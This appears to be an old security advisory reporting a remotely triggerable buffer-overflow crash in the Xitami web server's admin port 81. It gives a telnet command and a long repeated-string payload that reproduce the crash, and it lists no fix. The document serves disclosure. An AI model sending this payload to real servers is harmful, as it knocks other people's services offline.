COMMAND

    Xitami

SYSTEMS AFFECTED

    Xitami Web Servers

PROBLEM

    Meliksah Ozoral  found following.   He found  a bug  on Xitami web
    server.  He tested it on  v2.4c3 it worked very well.   Xitami DoS
    is a remotely exploitable buffer  overflow.  Xitami has open  port
    81 for admin config program.  You can crash server by sending huge
    packets on port 81.  For Example:

        telnet localhost 81

        #FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ#
        #FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ#
        #FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ#
        #FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ#
        #FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ#
        #FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ#
        #FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ#
        #FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ#
        #FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ#
        #FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ#
        #FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ#
        #FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ#
        #FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ#
        #FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ#
        #FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ#
        #FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ#
        #FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ#
        #FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ##FOGRULAZ#

    Xitami Crashed.

SOLUTION

    Nothing yet.